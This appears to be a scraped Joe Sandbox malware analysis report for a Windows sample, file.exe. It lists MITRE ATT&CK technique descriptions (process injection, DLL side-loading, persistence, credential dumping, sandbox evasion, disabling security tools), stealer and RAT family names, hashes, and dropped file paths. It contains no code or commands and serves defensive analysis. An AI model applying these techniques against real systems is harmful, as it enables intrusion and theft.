Associated: 00000011.00000002.2431304002.0000000000180000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431645445.00000000001CD000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2431903094.00000000001D0000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.2432075609.00000000001E0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_180000_weX3lQ8AOU.jbxd

Similarity

API ID: AllocString
String ID: -$.$/$0$1$3
API String ID: 2525500382-387867814
Opcode ID: 90b7f839bbce1599ea59ea9f1349210fc71a59be43bd7c8ab2048137cee2a827
Instruction ID: 13245692fea3b033430d22039b2de4d05e8fff8aa1696485018a7751c5e4f310
Opcode Fuzzy Hash: 90b7f839bbce1599ea59ea9f1349210fc71a59be43bd7c8ab2048137cee2a827
Instruction Fuzzy Hash: DB919360508BC38AC3268B3C8888605FFA17B67234B4887DDE5F54E7E3D364D586C7A6

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Threatname: Cryptbot

Threatname: Zhark RAT

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFCFHDHIIIECBGCAKFIJDHJEGI

C:\ProgramData\AKFCBFHJDHJKECAKEHID

Windows Analysis Report
file.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre